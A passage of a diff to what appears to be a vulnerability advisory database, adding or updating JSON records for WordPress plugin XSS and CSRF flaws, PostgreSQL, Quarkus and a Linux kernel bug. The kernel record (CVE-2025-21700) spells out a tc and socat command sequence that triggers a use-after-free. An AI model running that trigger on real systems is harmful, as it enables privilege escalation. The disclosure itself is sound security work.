Profile & Restrict Content WordPress plugin before 4.15.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-02-13T06:15:20Z" diff --git a/advisories/unreviewed/2025/02/GHSA-682p-89mx-39wg/GHSA-682p-89mx-39wg.json b/advisories/unreviewed/2025/02/GHSA-682p-89mx-39wg/GHSA-682p-89mx-39wg.json new file mode 100644 index 00000000000..1fcdfcf978a --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-682p-89mx-39wg/GHSA-682p-89mx-39wg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-682p-89mx-39wg", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26562" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Shambhu Patnaik RSS Filter allows Stored XSS. This issue affects RSS Filter: from n/a through 1.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26562" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/rss-filter/vulnerability/wordpress-rss-filter-plugin-1-2-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-6fh8-xrqr-xxqm/GHSA-6fh8-xrqr-xxqm.json b/advisories/unreviewed/2025/02/GHSA-6fh8-xrqr-xxqm/GHSA-6fh8-xrqr-xxqm.json new file mode 100644 index 00000000000..70ac2102aa3 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-6fh8-xrqr-xxqm/GHSA-6fh8-xrqr-xxqm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fh8-xrqr-xxqm", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-26545" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in shisuh Related Posts Line-up-Exactly by Milliard allows Stored XSS. This issue affects Related Posts Line-up-Exactly by Milliard: from n/a through 0.0.22.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26545" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/related-posts-line-up-exactry-by-milliard/vulnerability/wordpress-related-posts-line-up-exactly-by-milliard-plugin-0-0-22-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-76m4-qvr6-mxcm/GHSA-76m4-qvr6-mxcm.json b/advisories/unreviewed/2025/02/GHSA-76m4-qvr6-mxcm/GHSA-76m4-qvr6-mxcm.json new file mode 100644 index 00000000000..ff38879d6ab --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-76m4-qvr6-mxcm/GHSA-76m4-qvr6-mxcm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76m4-qvr6-mxcm", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26580" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in CompleteWebResources Page/Post Specific Social Share Buttons allows Stored XSS. This issue affects Page/Post Specific Social Share Buttons: from n/a through 2.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26580" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/pagepost-specific-social-share-buttons/vulnerability/wordpress-page-post-specific-social-share-buttons-plugin-2-1-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-7hrh-v62r-6754/GHSA-7hrh-v62r-6754.json b/advisories/unreviewed/2025/02/GHSA-7hrh-v62r-6754/GHSA-7hrh-v62r-6754.json new file mode 100644 index 00000000000..7ea681dffc8 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-7hrh-v62r-6754/GHSA-7hrh-v62r-6754.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hrh-v62r-6754", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26569" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in callmeforsox Post Thumbs allows Stored XSS. This issue affects Post Thumbs: from n/a through 1.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26569" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/post-thumbs/vulnerability/wordpress-post-thumbs-plugin-1-5-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-8qx7-7grr-r4cv/GHSA-8qx7-7grr-r4cv.json b/advisories/unreviewed/2025/02/GHSA-8qx7-7grr-r4cv/GHSA-8qx7-7grr-r4cv.json index c828db0a838..9c4424ae9aa 100644 --- a/advisories/unreviewed/2025/02/GHSA-8qx7-7grr-r4cv/GHSA-8qx7-7grr-r4cv.json +++ b/advisories/unreviewed/2025/02/GHSA-8qx7-7grr-r4cv/GHSA-8qx7-7grr-r4cv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8qx7-7grr-r4cv", - "modified": "2025-02-13T00:33:06Z", + "modified": "2025-02-13T15:31:24Z", "published": "2025-02-13T00:33:06Z", "aliases": [ "CVE-2024-39356" diff --git a/advisories/unreviewed/2025/02/GHSA-94g7-wcm2-gxpr/GHSA-94g7-wcm2-gxpr.json b/advisories/unreviewed/2025/02/GHSA-94g7-wcm2-gxpr/GHSA-94g7-wcm2-gxpr.json new file mode 100644 index 00000000000..42ee09237d8 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-94g7-wcm2-gxpr/GHSA-94g7-wcm2-gxpr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-94g7-wcm2-gxpr", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26570" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in uamv Glance That allows Cross Site Request Forgery. This issue affects Glance That: from n/a through 4.9.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26570" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/glance-that/vulnerability/wordpress-glance-that-plugin-4-9-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-f4w6-v8vf-9r8v/GHSA-f4w6-v8vf-9r8v.json b/advisories/unreviewed/2025/02/GHSA-f4w6-v8vf-9r8v/GHSA-f4w6-v8vf-9r8v.json new file mode 100644 index 00000000000..1cc3e13cab6 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-f4w6-v8vf-9r8v/GHSA-f4w6-v8vf-9r8v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f4w6-v8vf-9r8v", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26550" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Kunal Shivale Global Meta Keyword & Description allows Stored XSS. This issue affects Global Meta Keyword & Description: from n/a through 2.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26550" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/global-meta-keyword-and-description/vulnerability/wordpress-global-meta-keyword-description-plugin-2-3-csrf-to-cross-site-scripting-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-gqrv-h528-v8h8/GHSA-gqrv-h528-v8h8.json b/advisories/unreviewed/2025/02/GHSA-gqrv-h528-v8h8/GHSA-gqrv-h528-v8h8.json new file mode 100644 index 00000000000..0ddcd94a992 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-gqrv-h528-v8h8/GHSA-gqrv-h528-v8h8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gqrv-h528-v8h8", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-26538" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Rossiter Prezi Embedder allows Stored XSS. This issue affects Prezi Embedder: from n/a through 2.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26538" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/prezi-embedder/vulnerability/wordpress-prezi-embedder-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-hm72-wjjw-cqff/GHSA-hm72-wjjw-cqff.json b/advisories/unreviewed/2025/02/GHSA-hm72-wjjw-cqff/GHSA-hm72-wjjw-cqff.json index 123a631d8d6..e68f425966f 100644 --- a/advisories/unreviewed/2025/02/GHSA-hm72-wjjw-cqff/GHSA-hm72-wjjw-cqff.json +++ b/advisories/unreviewed/2025/02/GHSA-hm72-wjjw-cqff/GHSA-hm72-wjjw-cqff.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hm72-wjjw-cqff", - "modified": "2025-02-13T06:31:43Z", + "modified": "2025-02-13T15:31:24Z", "published": "2025-02-13T06:31:43Z", "aliases": [ "CVE-2024-12586" ], "details": "The Chalet-Montagne.com Tools WordPress plugin through 2.7.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-02-13T06:15:20Z" diff --git a/advisories/unreviewed/2025/02/GHSA-mg3q-qc38-r72c/GHSA-mg3q-qc38-r72c.json b/advisories/unreviewed/2025/02/GHSA-mg3q-qc38-r72c/GHSA-mg3q-qc38-r72c.json new file mode 100644 index 00000000000..c3648b01e06 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-mg3q-qc38-r72c/GHSA-mg3q-qc38-r72c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg3q-qc38-r72c", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26552" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in badrHan Naver Syndication V2 allows Stored XSS. This issue affects Naver Syndication V2: from n/a through 0.8.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26552" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/badr-naver-syndication/vulnerability/wordpress-naver-syndication-v2-plugin-0-8-3-csrf-to-stored-cross-site-scripting-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-mhw9-x46c-v6q4/GHSA-mhw9-x46c-v6q4.json b/advisories/unreviewed/2025/02/GHSA-mhw9-x46c-v6q4/GHSA-mhw9-x46c-v6q4.json new file mode 100644 index 00000000000..68fef06c739 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-mhw9-x46c-v6q4/GHSA-mhw9-x46c-v6q4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhw9-x46c-v6q4", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-1094" + ], + "details": "Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL. Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1094" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2025-1094" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-149" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-pgcf-pv65-5j53/GHSA-pgcf-pv65-5j53.json b/advisories/unreviewed/2025/02/GHSA-pgcf-pv65-5j53/GHSA-pgcf-pv65-5j53.json new file mode 100644 index 00000000000..542dd708d20 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-pgcf-pv65-5j53/GHSA-pgcf-pv65-5j53.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgcf-pv65-5j53", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-26539" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in petkivim Embed Google Map allows Stored XSS. This issue affects Embed Google Map: from n/a through 3.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26539" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/embed-google-map/vulnerability/wordpress-embed-google-map-plugin-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-phg3-gv66-q38x/GHSA-phg3-gv66-q38x.json b/advisories/unreviewed/2025/02/GHSA-phg3-gv66-q38x/GHSA-phg3-gv66-q38x.json new file mode 100644 index 00000000000..14458aa6229 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-phg3-gv66-q38x/GHSA-phg3-gv66-q38x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phg3-gv66-q38x", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-1247" + ], + "details": "A flaw was found in Quarkus REST that allows request parameters to leak between concurrent requests if endpoints use field injection without a CDI scope. This vulnerability allows attackers to manipulate request data, impersonate users, or access sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1247" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-1247" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345172" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-488" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-pw24-vxq6-ghrm/GHSA-pw24-vxq6-ghrm.json b/advisories/unreviewed/2025/02/GHSA-pw24-vxq6-ghrm/GHSA-pw24-vxq6-ghrm.json index 3748a898329..90d9a943739 100644 --- a/advisories/unreviewed/2025/02/GHSA-pw24-vxq6-ghrm/GHSA-pw24-vxq6-ghrm.json +++ b/advisories/unreviewed/2025/02/GHSA-pw24-vxq6-ghrm/GHSA-pw24-vxq6-ghrm.json @@ -30,6 +30,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-77", "CWE-94" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2025/02/GHSA-qqpc-9mxg-w3j5/GHSA-qqpc-9mxg-w3j5.json b/advisories/unreviewed/2025/02/GHSA-qqpc-9mxg-w3j5/GHSA-qqpc-9mxg-w3j5.json new file mode 100644 index 00000000000..d636f171215 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-qqpc-9mxg-w3j5/GHSA-qqpc-9mxg-w3j5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqpc-9mxg-w3j5", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26568" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in jensmueller Easy Amazon Product Information allows Stored XSS. This issue affects Easy Amazon Product Information: from n/a through 4.0.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26568" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/easy-amazon-product-information/vulnerability/wordpress-easy-amazon-product-information-plugin-4-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-qv3v-75mc-x94w/GHSA-qv3v-75mc-x94w.json b/advisories/unreviewed/2025/02/GHSA-qv3v-75mc-x94w/GHSA-qv3v-75mc-x94w.json new file mode 100644 index 00000000000..20ecfe2e4b4 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-qv3v-75mc-x94w/GHSA-qv3v-75mc-x94w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv3v-75mc-x94w", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26547" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in nagarjunsonti My Login Logout Plugin allows Stored XSS. This issue affects My Login Logout Plugin: from n/a through 2.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26547" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/my-loginlogout/vulnerability/wordpress-my-login-logout-plugin-plugin-2-4-csrf-to-stored-cross-site-scripting-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-qxfx-2gqp-cq92/GHSA-qxfx-2gqp-cq92.json b/advisories/unreviewed/2025/02/GHSA-qxfx-2gqp-cq92/GHSA-qxfx-2gqp-cq92.json new file mode 100644 index 00000000000..3b617c7f928 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-qxfx-2gqp-cq92/GHSA-qxfx-2gqp-cq92.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxfx-2gqp-cq92", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26572" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in jesseheap WP PHPList allows Cross Site Request Forgery. This issue affects WP PHPList: from n/a through 1.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26572" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/phplist-form-integration/vulnerability/wordpress-wp-phplist-plugin-1-7-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-r79j-x479-2vhw/GHSA-r79j-x479-2vhw.json b/advisories/unreviewed/2025/02/GHSA-r79j-x479-2vhw/GHSA-r79j-x479-2vhw.json index 3df12eb4c72..7a3a8ca7242 100644 --- a/advisories/unreviewed/2025/02/GHSA-r79j-x479-2vhw/GHSA-r79j-x479-2vhw.json +++ b/advisories/unreviewed/2025/02/GHSA-r79j-x479-2vhw/GHSA-r79j-x479-2vhw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r79j-x479-2vhw", - "modified": "2025-02-13T12:31:07Z", + "modified": "2025-02-13T15:31:25Z", "published": "2025-02-13T12:31:07Z", "aliases": [ "CVE-2025-21700" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: Disallow replacing of child qdisc from one parent to another\n\nLion Ackermann was able to create a UAF which can be abused for privilege\nescalation with the following script\n\nStep 1. create root qdisc\ntc qdisc add dev lo root handle 1:0 drr\n\nstep2. a class for packet aggregation do demonstrate uaf\ntc class add dev lo classid 1:1 drr\n\nstep3. a class for nesting\ntc class add dev lo classid 1:2 drr\n\nstep4. a class to graft qdisc to\ntc class add dev lo classid 1:3 drr\n\nstep5.\ntc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024\n\nstep6.\ntc qdisc add dev lo parent 1:2 handle 3:0 drr\n\nstep7.\ntc class add dev lo classid 3:1 drr\n\nstep 8.\ntc qdisc add dev lo parent 3:1 handle 4:0 pfifo\n\nstep 9. Display the class/qdisc layout\n\ntc class ls dev lo\n class drr 1:1 root leaf 2: quantum 64Kb\n class drr 1:2 root leaf 3: quantum 64Kb\n class drr 3:1 root leaf 4: quantum 64Kb\n\ntc qdisc ls\n qdisc drr 1: dev lo root refcnt 2\n qdisc plug 2: dev lo parent 1:1\n qdisc pfifo 4: dev lo parent 3:1 limit 1000p\n qdisc drr 3: dev lo parent 1:2\n\nstep10. trigger the bug <=== prevented by this patch\ntc qdisc replace dev lo parent 1:3 handle 4:0\n\nstep 11. Redisplay again the qdiscs/classes\n\ntc class ls dev lo\n class drr 1:1 root leaf 2: quantum 64Kb\n class drr 1:2 root leaf 3: quantum 64Kb\n class drr 1:3 root leaf 4: quantum 64Kb\n class drr 3:1 root leaf 4: quantum 64Kb\n\ntc qdisc ls\n qdisc drr 1: dev lo root refcnt 2\n qdisc plug 2: dev lo parent 1:1\n qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p\n qdisc drr 3: dev lo parent 1:2\n\nObserve that a) parent for 4:0 does not change despite the replace request.\nThere can only be one parent. b) refcount has gone up by two for 4:0 and\nc) both class 1:3 and 3:1 are pointing to it.\n\nStep 12. send one packet to plug\necho \"\" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))\nstep13. send one packet to the grafted fifo\necho \"\" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))\n\nstep14. lets trigger the uaf\ntc class delete dev lo classid 1:3\ntc class delete dev lo classid 1:1\n\nThe semantics of \"replace\" is for a del/add _on the same node_ and not\na delete from one node(3:1) and add to another node (1:3) as in step10.\nWhile we could \"fix\" with a more complex approach there could be\nconsequences to expectations so the patch takes the preventive approach of\n\"disallow such config\".\n\nJoint work with Lion Ackermann ", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-02-13T12:15:27Z" diff --git a/advisories/unreviewed/2025/02/GHSA-rj86-9wrh-h84g/GHSA-rj86-9wrh-h84g.json b/advisories/unreviewed/2025/02/GHSA-rj86-9wrh-h84g/GHSA-rj86-9wrh-h84g.json new file mode 100644 index 00000000000..7c7ee0b10f9 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-rj86-9wrh-h84g/GHSA-rj86-9wrh-h84g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj86-9wrh-h84g", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2024-13182" + ], + "details": "The WP Directorybox Manager plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_parse_request' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13182" + }, + { + "type": "WEB", + "url": 